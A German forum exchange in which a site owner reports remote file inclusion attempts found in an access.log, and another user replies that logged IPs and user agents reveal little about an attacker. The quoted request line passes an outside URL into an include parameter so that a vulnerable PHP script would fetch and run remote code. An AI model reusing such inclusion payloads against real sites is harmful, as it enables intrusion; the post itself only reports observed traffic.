Gutem Morgen,
hab grade in meinen access.log einen Hacker ausfindig gemacht, dieses mal auf meiner geliebten nimmet Domain.
Hab dutzende abfragen in Form von
/lokal//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt???
Die IPs sind
216.252.87.12 - libwww-perl/5.79
64.22.125.219 - libwww-perl/5.805
Du hast in der Log-Datei die IP-Adressen und die User-Agenten stehen, die HTTP-Requests machen. Das hat mit "Hacken" grundsätzlich gar nichts zu tun.
IP-Adresse: muss nicht vom Zugangsprovider sein, kann auch von einem Proxy-Server stammen.
User-Agent: Blahh. Da kann auch "Zitrone" stehen.
Ein richtiger Hacker dringt in ein System ein, ohne seine Visitenkarte zu hinterlassen.
Schönen Tag noch,
Hotte